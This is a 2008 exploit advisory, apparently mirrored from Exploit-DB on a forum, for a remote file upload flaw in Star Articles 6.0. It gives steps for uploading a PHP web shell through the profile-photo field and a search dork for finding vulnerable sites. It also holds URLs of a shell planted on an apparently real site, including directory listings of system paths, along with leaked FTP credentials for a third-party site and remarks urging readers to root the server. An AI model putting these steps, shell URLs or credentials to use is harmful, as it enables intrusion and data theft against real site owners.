- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7251
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-7076
- Дата публикации
- 2008-11-27
Код:
[~] Star Articles 6.0 Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: allinurl:"article.download.php" ( baya bi site var )
[~]
[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
[~] -----------------------------------------------------------
expl:
http://script//authorphoto/user_name[id].php
example:
http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bu serverdaki bir site icin:
ftp://ftp.ababy.com.au/ ( ftp pass ve username )
user: kiddybab
pass: KidEw1nk08
ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
first register for site
after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
click to gozat button and select your shell after upload you shell
more after go repat edit profile page and you look you photo. right click to you photo
select to properties copy photo link and paste you explorer.
go your shell
examp:
user: [email protected]
passwd: zorlu1
login:
http://www.lcfarticles.com/user.login.php
shell:
http://www.lcfarticles.com//authorphoto/zorlu40.php
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & RedHaK
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-27]- Источник
- www.exploit-db.com
